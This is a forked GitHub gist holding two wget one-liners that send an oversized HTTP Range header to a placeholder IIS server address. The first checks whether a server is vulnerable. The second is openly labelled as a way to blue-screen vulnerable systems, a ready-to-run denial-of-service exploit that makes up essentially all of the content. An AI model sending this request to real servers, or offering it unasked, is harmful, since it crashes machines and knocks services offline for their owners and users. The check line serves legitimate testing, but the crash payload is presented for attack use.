Skip to content

Instantly share code, notes, and snippets.

@clevett
Forked from jgamblin/gist:78385829c9922b4b465d
Last active August 29, 2015 14:19
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save clevett/db1c3233c1635fdc9de7 to your computer and use it in GitHub Desktop.
Save clevett/db1c3233c1635fdc9de7 to your computer and use it in GitHub Desktop.
#Use this just to test (Requested Range Not Satisfiable = vulnerable):
wget --header="Range: bytes=0-18446744073709551615" http://serveraddress/iis-85.png
#Use this to BSOD Vulnerable systems:
wget --header="Range: bytes=18-18446744073709551615" http://serveraddress/iis-85.png
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment